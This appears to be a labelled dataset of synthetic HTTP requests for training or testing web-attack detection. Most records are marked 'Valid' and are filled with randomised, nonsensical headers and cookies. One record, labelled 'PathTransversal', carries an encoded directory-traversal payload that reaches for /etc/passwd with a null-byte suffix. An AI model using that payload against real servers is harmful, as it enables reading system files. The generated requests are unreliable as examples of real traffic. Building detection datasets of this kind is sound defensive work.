~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17883
Start - Id: 14707
class: Valid
GET /drfgxoeenawtIOvsrd/synhls7trioZie/QeJJ2_Rd.i@2J/5tpVF0V2a8UlO/nkaTre6Fnvei9r/ea1fMxk3bd/Rzk6eiFl6FrIF/lMM-UOQMY17xC7isg/eEftrHkPqt/r9neSephhSk/r40sn7_Z8466WA0XdCX.shtml? HTTP/1.0
Host: www.xIo1fu.net
Connection: close
Accept: text/html
Accept-Charset: windows-1255;q=0.7, x-mac-chinesesimp;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 218.227.164.177
Cookie: xjnraghinH=nahdsOnerN48etI;hhtIi6reFn=hKB44qt;hits=777587153
Cookie2: $Version="4"
Date: Wed, 11 Nov 09 01:34:17 CET
ETag: "TKHAKEZUVMaGJyR4W"
Expect: adEr
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Wed, 07 Jul 04 03:15:42 UTC
If-Unmodified-Since: Mon, 19 Jun 06 08:47:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.3
Pragma: E='hd'
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: uFtse ou2xw=dsnenvsl
Range: 07-
Referer: /0eelyu/iaeiii.pl
TE: trailers,chunked;q=0.8
Trailer: If-None-Match
User-Agent: exaToae (phFEzaq; qCN-2eb; hwzK5hs)
UA-CPU: x86
UA-Disp: 8733,634,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0368x227
Via: HTTP/6.4 11.201.160.11, izit/8.7 208.108.108.254, FTP/1.0 250.39.140.104
Transfer-Encoding: compress
Upgrade: xru/9.2, cklewN/7.7, teae/6.3, ndpilb/8.6, hto/7.4
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14707
Start - Id: 26742
class: Valid
GET /pu9xHvN/yfbtUMF3KGqs9.xk2/iineirnslode/Z0jLSyBaccess_logf/a0MsBKi./aXORvXMSZQh6.php3?sz3soeoadnd=e%40axJ&lr=6288824671&l0RotueSa=feesam&Oy@aQl_A=i%2F-+r&KLiqM.wnmEiQ=%3B+on&pc8WPN=s9Z_nNBsGa&oS7oeuddo6aeh=uIihwr&fxd=028441916 HTTP/1.1
Host: 184.108.160.52
Connection: keep-alive
Accept: audio/*;q=0.6, video/mpeg;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.1, gzip, deflate
Accept-Language: Fxime5l-rhsaii;q=0.8, uaFw8at-g0e;q=0.2
Cache-Control: no-transform
Client-ip: 25.76.182.59
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="701"
Date: Tue, 15 Sep 09 19:23:30 GMT
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: 100-continue
From: slnt@rItzvIc.net
If-Modified-Since: Sun, 23 Jul 06 05:17:21 GMT
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: *
If-None-Match: "2ql3l_yVJLGn-mf93RTF"
If-Range: "3t8jw1TwSNaskq@"
Max-Forwards: 7650
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: trel9e 9e8qd=tce47
Authorization: NTLM YXJkZXRuaWhhdGFJdlpsdDZndW53YWJiZGFxc2FlZTlkdDRzZnRvZW5kYQ==
Range: 18782-,79-10,1-29104
Referer: http://www.cohde.biz/mdtvjha/r8zwvyt.nsf
TE: trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (X11; U; Linux i386 6.8; lo-Sg; rv:1.2.6) Gecko/63931455
UA-CPU: PowerPC
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 358x270
Via: 2.1 189.80.107.122
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 690 159.100.10.222 "ttdrx" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26742
Start - Id: 8468
class: Valid
GET /7havingvN/nHKzYYS.1qe8sOayCO/B1ggPentmatns/r4/iZ_8jJGjtk/ogOhmrqkdrwooaeaI/F0amdpPyc/yu/jj3rcq5/e0eoDktcado/0zobIjod2.exe? HTTP/1.1
Host: 1.10.168.199
Connection: Utn40oit
Accept: */*
Accept-Charset: windows-1253, iso-8859-15, cp-932
Accept-Encoding: identity, identity, identity;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 80.15.106.68
Cookie: whereKz62h3tT=ihe8q;esghtr=ind'passwd3fvs
Cookie2: $Version="81"
Date: Sat, 01 Aug 09 10:15:48 CET
ETag: W/"xBUPDdRe@TMYU4H"
Expect: dgrje
From: 1entnt@uued.net
If-Modified-Since: Wed, 17 Mar 10 19:02:20 UTC
If-Unmodified-Since: Wed, 09 Sep 09 11:17:39 CET
If-Match: *
If-None-Match: "pM_qNKrsy-pfat7OUv"
If-Range: Fri, 09 Apr 04 16:07:53 CET
Max-Forwards: 73
MIME-Version: 2.1
Pragma: 8heuhseo='Be9iaer'
Proxy-Authorization: NTLM NnR0aHB1TkxsU2FibzhkanRhc24xbnRyZWUzZXpla2xoYWE=
Authorization: Basic aXl4ZWZkOmo2ZHdwbg==
Range: 7593-23,41-590
Referer: /eicrq/7eet/e3Co.tar.gz
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (Windows; U; Win98 3.1; ec-ge; rv:4.2.3) Gecko/01521521
UA-CPU: Sparc
UA-Disp: 7829,965,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 963x121
Via: 1.6 www.wylU4ssi.tiff, FTP/7.5 www.S9tl.gif:1130
Transfer-Encoding: Sivis
Upgrade: att6/5.9, lascr4/0.2, dko/7.4, ujer/7.0, 6vnnaz/2.3
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 240.48.106.176
X-Serial-Number: 3858691762
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8468
Start - Id: 9586
class: Valid
GET /lh16M4ayWiL1B9CXts/sapd/iqG_%ufOTyhaving/SkndLm.aspx?leherJAt1oea=g_m-XnyBzVac&hgn=2794471&8uqQKl=8&asOicjtcotS=sa&TNeI0aia=tgwP8Hdv_5UJ&eaiddri9inn=030&obsadnahvs=hcphpMdAta&ZiTwfd2Ri5=942466&gaiaedmputl7=5vdihtsetie&ErylbTdsss=nhe HTTP/1.0
Host: www.Msson.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: hboasm-nh, 02-0ek7gl;q=0.9, zEgl2-enaiht;q=0.7, xartc9-sibm;q=0.3
Cache-Control: only-if-cached
Client-ip: 108.161.169.186
Cookie: ahlmso6s=atzntutiOu dtt$;sRw0cvbnhoAed=ymbcnetcatt dhClnbtlacei
Cookie2: $Version="085"
Date: Mon, 25 Feb 08 14:26:47 UTC
ETag: W/"jNUQqj0@oyyO-EFGzPbC"
Expect: WtRtnei
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Tue, 07 Dec 04 18:32:46 UTC
If-Match: *
If-None-Match: "3_sf3fa8DMb2IqCl"
If-Range: Wed, 07 Jan 04 13:39:47 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: msos='6t'
Proxy-Authorization: Digest nonce
Authorization: Basic dGZsNDR0OnhlbHRoaG9M
Range: 60-,-239
Referer: /litr/bs89Eit.wav
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.3 (compatible; iuri8nlEc5; Unix; f6rl2e)
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0370x8472
Via: HTTP/3.0 254.0.22.19
Transfer-Encoding: compress
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 173.217.112.187
X-Serial-Number: 1202547378477429523
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9586
Start - Id: 7559
class: Valid
PUT /ncOkC-m/iFt1@iK@hp_gz4cbhBMO/etnterjihBhogthsteOe/jkX2LV1dIlkUA2kEWt/LBexec/eSieres4lneewtealue/2ee2r9ehSt5yostO1atk/oidsaefbrsro1k5i/etK2wWhOef4nsaD9teo/t5Zm9ChbGmrlwsJy.PP.cgi? HTTP/1.1
Content-Length: 72
Content-Language: ozwrrhs
Content-Encoding: gzip
Content-Location: http://s8ydan.gov/DBnc3he/0Ytr9/emeeehbk/r6t3La3.bin
Content-MD5: QmFpZG5uZWx0Zmp0cmV0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Jun 05 11:52:09 CET
Last-Modified: Thu, 10 Jul 08 23:13:41 UTC
Host: www.NGpectmv.it
Connection: m0es5dy
Accept: video/quicktime, application/*;q=0.9, application/postscript
Accept-Charset: windows-874
Accept-Encoding: deflate;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-age=1780
Client-ip: 13.235.197.251
Cookie: DB33=gmnsmnh33;too=fwinntswp-e~t;.72rX7kvM=22505;0giheN8t=0062;Xakd=scrlo6e;EMo7=n
Cookie2: $Version="01"
Date: Mon, 01 Aug 05 07:46:09 GMT
ETag: "lNwGXgAu@mRnVRxV"
Expect: 100-continue
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Thu, 08 Feb 07 05:35:33 GMT
If-Unmodified-Since: Thu, 18 Feb 10 12:57:12 GMT
If-Match: "RwTJoat5ZNYvuYKs"
If-None-Match: *
If-Range: Wed, 22 Jul 09 23:15:23 CET
Max-Forwards: 0523
MIME-Version: 1.7
Pragma: saui7ite='n'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: -9533
Referer: /d59oae/o3tlijsk.php
TE: chunked;q=0.0,trailers,trailers
Trailer: Via
User-Agent: dNvile (ogarN.H6g)
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5452x8667
Via: 5.6 www.td0hm.shtml, 0.5 74.123.21.42:25131, HTTP/7.6 25.219.173.142:0237
Transfer-Encoding: gzip
Upgrade: 5ANuc/0.3, Ddhee/6.4
Warning: 978 79.148.211.112 "yetNaa" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lzx5n=u&ottmEn=98938625&wmta7iresEts1=htaccessof]:Doaduemorobjecth l

End - Id: 7559
Start - Id: 28274
class: Valid
GET /OPHpasswdD/r-Jndm4jSc/Tgeepke1eN3wTTCdijt/rYPKPGz8WT1F@x/siEsA/awe/Sioeoom/avhScninlrlEu7Bes81f/iV/l81cElx.Ogy..msf?cenAietIRqhb82=1987071414&nuRftllD08=epHN&pdA3o2ppadeddoi=sln&F6E60y=96&cahehen3aq=lo&ld=vhttpsodoo%5Cdsrnloptz%27&iQENmxI=inc&sttliejhee=gstco&iwnMveyi=85332&cTs.QQYvG=103 HTTP/1.1
Host: 250.216.144.15
Connection: ou39tEnT
Accept: */*
Accept-Charset: cp-936, big5, cp-950;q=0.2, x-mac-ce
Accept-Encoding: compress, compress, identity
Accept-Language: lpi-2Lsaedb1, oaof2hte-hr;q=0.6, hae-o4ed;q=0.2, rpy-e, mt-LoYr
Cache-Control: only-if-cached
Client-ip: 79.12.235.104
Cookie: QM1mtVAjOR=;emar
Cookie2: $Version="5"
Date: Thu, 14 Oct 04 08:24:48 CET
ETag: "2fXL_y5bCBBhA@GLyTH"
Expect: nsbpva=di6mmt;NdIws
From: Elo5h@esedtsi8.net
If-Modified-Since: Sun, 30 Sep 07 13:18:07 CET
If-Unmodified-Since: Mon, 13 Feb 06 13:07:56 UTC
If-Match: "sYvM.E0XLUg9MCCIPy98"
If-None-Match: "q1mjNiRx0IW1k8AUexn"
If-Range: *
Max-Forwards: 8688
MIME-Version: 6.5
Pragma: 46sOc2ae=so
Proxy-Authorization: eotn c3ei=whZbs
Authorization: Vsnhir dgntI=ltza9iao
Range: 3-15771,8-
Referer: /40payall/el4Tee.jpg
TE: trailers
Trailer: Accept
User-Agent: eXueHj http://www.qorre.biz
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0895x834
Via: HTTP/6.2 201.93.184.109, rtparo/2.7 www.Tgaeed.js:489
Transfer-Encoding: kaeljv
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28274
Start - Id: 16947
class: Valid
GET /bi/fL7hFVyExo0/Womreey6c/tk/ssbrateuivrEn/dH/CksshutdownZmWvFtM/d2nnDwtnbsiw/x1itm5drtTeI0rgf/r_2TMQs2.xm6n5/7tegswwhsishe/3s@h.jpg?xao=esG&ogpob=sIste&rluboa=rnx&hngnd=41092299&hotrhqmeDoi=942497081&armxctdmitlthnT=8 HTTP/1.1
Host: www.xissouti.be
Connection: close
Accept: audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 65.159.241.124
Cookie: lda=a@lc4fW0-eJE;s81f9si=24691;a6Msssoyhkp=pn tatqg0)cstyleei;ri0sceRikjiroe=bpedoaopenevalAt~;oH8OudmOotonh=195529327;datioan=torusrgh)w%olsstlseeih
Cookie2: $Version="47"
Date: Thu, 03 Feb 05 05:35:57 CET
ETag: W/"Pdg@K952BV3QrSxUe"
Expect: 100-continue
From: vvoalae@aaertALeea.biz
If-Modified-Since: Sat, 30 Jan 10 21:36:05 GMT
If-Unmodified-Since: Tue, 10 Nov 09 16:03:31 CET
If-Match: "YIjKF@yx55EK9fdy3"
If-None-Match: *
If-Range: "mAKEAqPs2.oNMW6Wi"
Max-Forwards: 934
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: gni3k simV4iHt=oMGd95c
Authorization: Digest nonce
Range: -648885,06-7154
Referer: http://www.sann.biz/1ouo/t2k5Tisa/r5neK7io/eonih/y1geu.exe
TE: gzip;q=0.9,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 4.7; l6-lc; rv:6.7.4) Gecko/38558033
UA-CPU: 68000
UA-Disp: 035,022,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 453x250
Via: 6.2 www.qnftNaa.js, mZFjue/5.4 www.rIinvpp.jpeg:319, 7.4 202.146.70.36
Transfer-Encoding: deflate
Upgrade: atrUe/4.0, 1tC/3.8, irm/0.5, 0uBS/4.3, t3o/6.0
Warning: 192 84.133.95.53 "rthasExesecsg3nhOcn" "Sun, 14 Feb 10 11:00:32 GMT"
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 913897640991
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16947
Start - Id: 21059
class: Valid
GET /SPZoReidvhF/fiuvdsgdLeo1mugsa/eKEHJk/tELgNOvS7LeOR7Lk/a8Gy.php4?dMYW30WZ=080891546&hthnxncil=692&CteOgsmiHOusr=xamr%5C HTTP/1.1
Host: www.ncikxhnn4.ch
Connection: obzhadm
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.5, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale=33
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="56"
Date: Wed, 31 Mar 04 05:56:59 UTC
ETag: W/"5Rgo-LZmIiChC7F_t8"
Expect: 100-continue
From: oAtrliet@taveotNi.be
If-Modified-Since: Tue, 29 May 07 13:49:46 UTC
If-Unmodified-Since: Sat, 24 Sep 05 11:41:52 UTC
If-Match: *
If-None-Match: "RwSvwSGVnJlU4JC_"
If-Range: Sun, 21 Sep 08 24:37:25 UTC
Max-Forwards: 8
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic RElmdGVydHI6emR0c2xvc2E=
Range: 249654-
Referer: /teir.cgi
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.6 (compatible; MSIE 0.6; Win98; er1MErti; penTi; vtftirIxeh)
UA-CPU: 68000
UA-Disp: 856,3044,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x776
Via: HTTP/2.7 90.63.195.184:58189, CmiHti/3.1 253.219.127.50
Transfer-Encoding: compress
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21059
Start - Id: 15058
class: Valid
GET /Sge9GCJu0nJx.cfm?teaspdvUetdv1=%27evrsla%2Fsg+t%7Cd&ttiInRauHn3he=rgX0i1xi7&iawdhllnlze=2971&hy=rpFKKMc3QkX&pneNa4svcg4=ch2r&egfns30nA=qotaccess_logsmetay&aadmin-lqxH80D=lQ HTTP/1.0
Host: www.aRIaracbse.uk
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: n2atB-f, wleq-iiHch5Wg;q=0.0, egls-rpcadon, Sc-dnr, fikth-eteEHin
Cache-Control: min-fresh=7284
Client-ip: 222.250.250.163
Cookie: Er4se=3lrrO hsaahc
Cookie2: $Version="71"
Date: Sun, 11 Apr 04 06:30:16 UTC
ETag: W/"BPURqs9TynV9AREMCpZ"
Expect: 100-continue
From: shdojh@32thstuem.biz
If-Modified-Since: Thu, 07 Dec 06 12:33:16 CET
If-Unmodified-Since: Thu, 19 Aug 04 11:22:25 GMT
If-Match: "Em.71T7P3Li5N5G468ta"
If-None-Match: "TvuqH1XMYwahoij"
If-Range: "AOqE1ifACBgYFHSK6h"
Max-Forwards: 681
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic ZXRsZXRub3I6dHRibmc=
Range: 4-,-3,94-
Referer: /fsnzhaRe/o2iu/cosEyOqh.txt
TE: trailers,gzip
Trailer: Via
User-Agent: eeD2rliy (erOvDR.xj9; 6Y1ppRZ; wYshr-DzE)
UA-CPU: MIPS
UA-Disp: 1398,2099,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 656x086
Via: FTP/7.9 140.95.236.145, c5of/8.6 www.mlem9n.html, 4.8 www.tnbn.jpeg:160
Transfer-Encoding: gzip
Upgrade: raA/4.1, led/0.8, Sna/5.8, aie/5.1, ipm/0.5
Warning: 670 120.59.241.81 "srredysdrtssiTT" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15058
Start - Id: 21176
class: Valid
GET /ISjgwinntxClq2HBmeta/r7POh4VOwatYmHgRLUn1/nph-connectyRDbUzioPD/MvbscriptJKo.Aapasswd8KlibH/Knehavingp8c1UCshutdownpXz/t-xFYw9/du1nost/18fX--b7YBCU_l59N/8mFhttpswGN@connect8jpassthruJl/qjgeLc61q7AX-sLs9v.gif?8dTdeaahs=ezr&toboatka=+wbinwaa%27sgn&ryceOta=nLoqYp8FwX&@_WnKperlTxGL=o11R2J.1I&2KexecyWlD0kUJ=0290504&E@-wjMvS-upasswd=b286&fItjridSzZyPpt9=DrraxVtx&httpY0yoK=vzt&uninsieeUTE9mte=9213076&RemzDtsretuer=3746 HTTP/1.1
Host: www.2ehp0h9r.cz
Connection: mio4e
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=58
Client-ip: 255.8.84.163
Cookie: hmombENju09Plso=eenohI;kgusaEnzidaph=7yL9;metae.L_=30938187;2octm=6;erag=glm73nwdAnuz
Cookie2: $Version="71"
Date: Tue, 22 Sep 09 11:41:31 GMT
ETag: "s83J8yls1uTiMv1"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Thu, 31 May 07 16:39:27 UTC
If-Unmodified-Since: Tue, 02 Oct 07 21:47:24 UTC
If-Match: "h4qon9y-7GJD-ok72"
If-None-Match: *
If-Range: Sat, 19 Jun 04 15:37:11 CET
Max-Forwards: 7
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: NTLM VHZsMmVvZW9lV2UxZXRubmhlZG9tZXN4d29hM2Ria2l1dDRjaGVw
Range: -888689,46910-
Referer: /Ew1zhg/itse/un8g.rar
TE: trailers,trailers
Trailer: Expect
User-Agent: ryeA/3.2.8.0
UA-CPU: PowerPC
UA-Disp: 9976,202,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: s0etg/6.5 34.86.136.130, 9.8 212.51.238.142
Transfer-Encoding: compress
Upgrade: aoN/9.8
Warning: 939 www.pRe78r.jpg:6 "nrdsdEswog10" 
X-Forwarded-For: 208.104.152.221
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21176
Start - Id: 46151
class: PathTransversal
GET /u.vd8MdocumentnA1/rS_sIDtu8Qzek/s-@P8v/rnwlbtthorryv9wy/tGMqLSES5L@V/3XKUATeval3rWC_0w/5y_j9likeZd6GQ.css?sI4konnase=hwIc&wthuh=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ilhahaR8=1520408259&euiz=9668&olU=jt4hoims&yceE=E HTTP/1.0
Host: www.rmeteoT.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 172.17.95.67
Cookie: fWJEhfR86qE=18505;ei8oes=97195343;8oso63=327394;AtnFhaazu0a=p;etuNyfntsEeu=7UihN_WIjC
Cookie2: $Version="64"
Date: Wed, 17 Nov 04 24:56:11 GMT
ETag: W/"Cpkj5v2oEph2JVYk"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 06 Mar 04 24:36:20 CET
If-Unmodified-Since: Sat, 20 Feb 10 02:46:20 GMT
If-Match: "EG0f8PeFHceGknMrW90i"
If-None-Match: *
If-Range: *
Max-Forwards: 526
MIME-Version: 8.6
Pragma: aosTNeA='ejsa'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ogaE"
Range: 930922-
Referer: http://www.8edC.fr/his2oiae.pdf
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: watur/9.5.2.2.3
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: thho
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46151
Start - Id: 23292
class: Valid
GET /C@0dmt9.asmx?deF3iAe=1t2ro+oegthphttps80dlsadhs&CRUcopyGCyQ=096685&OnwmTeguJl=aarsnafnlike%5C&krom=463&efbsoaew=70226189&iolairlsNds=nfrr2r4l7OwiTk&ar2tumser0=eaoa&eetbe=2c&scanm4ren0=see&8txtnaoiteuk=idi&sswienihnayLfoe=546623807&noyfjeiD=93197 HTTP/1.0
Host: www.eeinot8le.com
Connection: close
Accept: audio/x-wav;q=0.2
Accept-Charset: iso-8859-9, x-mac-chinesesimp;q=0.2, x-mac-icelandic
Accept-Encoding: *;q=0.7
Accept-Language: 3g-egtu;q=0.0
Cache-Control: l3=q
Client-ip: 134.16.201.22
Cookie: DexecgVitormRG4body=iniee2oms;tie2essr=adelete1;wiRarfonu=fMG;eozohtist=7;5c78p5Kfrm=t0arra&evocsiigri'a;ncheeabLn4Ots=709504
Cookie2: $Version="774"
Date: Wed, 26 Apr 06 21:59:54 UTC
ETag: "ZXxsPor0lcszJI.OA18"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Thu, 02 Feb 06 08:56:00 UTC
If-Unmodified-Since: Sun, 03 Apr 05 07:54:59 CET
If-Match: "biXr5Om.yX@wc37lz"
If-None-Match: "lxxLMkvXH_n.KA0L26_P"
If-Range: "XxonQOz3@s_XWcPfRz"
Max-Forwards: 2
MIME-Version: 7.6
Pragma: qrTd=apAdlaa
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM bGFvc25SbDhwYXljY252dDVXT2V0bGluM3NzYnNucmhuZW1zZQ==
Range: -8,52-66986
Referer: http://www.Eyowiem2.org/uyarnc/eamw/offet.html
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: tcrtynshse (iMYCacQdC)
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 626x088
Via: 5.6 92.3.146.193, FTP/9.4 173.219.106.79:288
Transfer-Encoding: um5s2P; sI2vdk=yint
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 500 49.153.182.242 "erstott" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23292
Start - Id: 14580
class: Valid
GET /bCnD/awm91h.cNeHts/n.h3floab/gnewsAeZtede7Oho/fsiidihnon/r38documentk.css?s8eden=le1fhe&pr2emurEhatLo=49&ee6z9w9x=ac%28ik HTTP/1.1
Host: www.lguae.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, euc-jp;q=0.9, x-mac-hebrew;q=0.7, x-mac-chinesetrad;q=0.2, cp-932;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 22.174.172.88
Cookie: uj=e1iactroelnM
Cookie2: $Version="25"
Date: Wed, 19 Mar 08 06:24:05 GMT
ETag: "7Y_LQYMG07XhR89YbcDL"
Expect: ifii
From: Iunytn@meeieTRgnn.ch
If-Modified-Since: Sun, 28 Nov 04 04:23:46 CET
If-Unmodified-Since: Sat, 08 Nov 08 09:49:01 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic T2lzb21JeDpkZFlmdXFvdw==
Authorization: NTLM ZURvTGZpbmN1aW9pc3RzZWkxZWd0ZG9mNGxyOW9PZXpUZXNrcXF0RVk=
Range: 45-4785,-21867,70176-3030
Referer: http://www.Aoee.biz/rtTrdfem/tOyurt/iaietrro.php3
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.6 (compatible; Konqueror/2.5; SunOS sun4u; oslo)
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 658x567
Via: 8.2 www.t0dOuDle.css
Transfer-Encoding: Pniesd
Upgrade: ob83t/0.9, dknr/1.9, tfeyhk/0.8, eqbo/3.7, 0mt9a/2.3
Warning: 663 www.eNonNsgt.tiff "zwetin" "Wed, 09 Feb 05 17:14:54 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 4195242584040796818
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14580
Start - Id: 31890
class: Valid
GET /6pSieexheey/flFstyleh/O7perlwThgY@9H/OysPjmrnOefbmao/hRvFGbf4Gb9fds.jpeg? HTTP/1.0
Host: www.Bhwc1.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 96.93.14.227
Cookie: PnsnawNanNce=asanrnaaylidTs3;detEte=tanbtoe4m3drhNel
Cookie2: $Version="230"
Date: Sun, 24 Jun 07 14:28:53 GMT
ETag: "X0-1@5U14SXHg50hPu-"
Expect: 100-continue
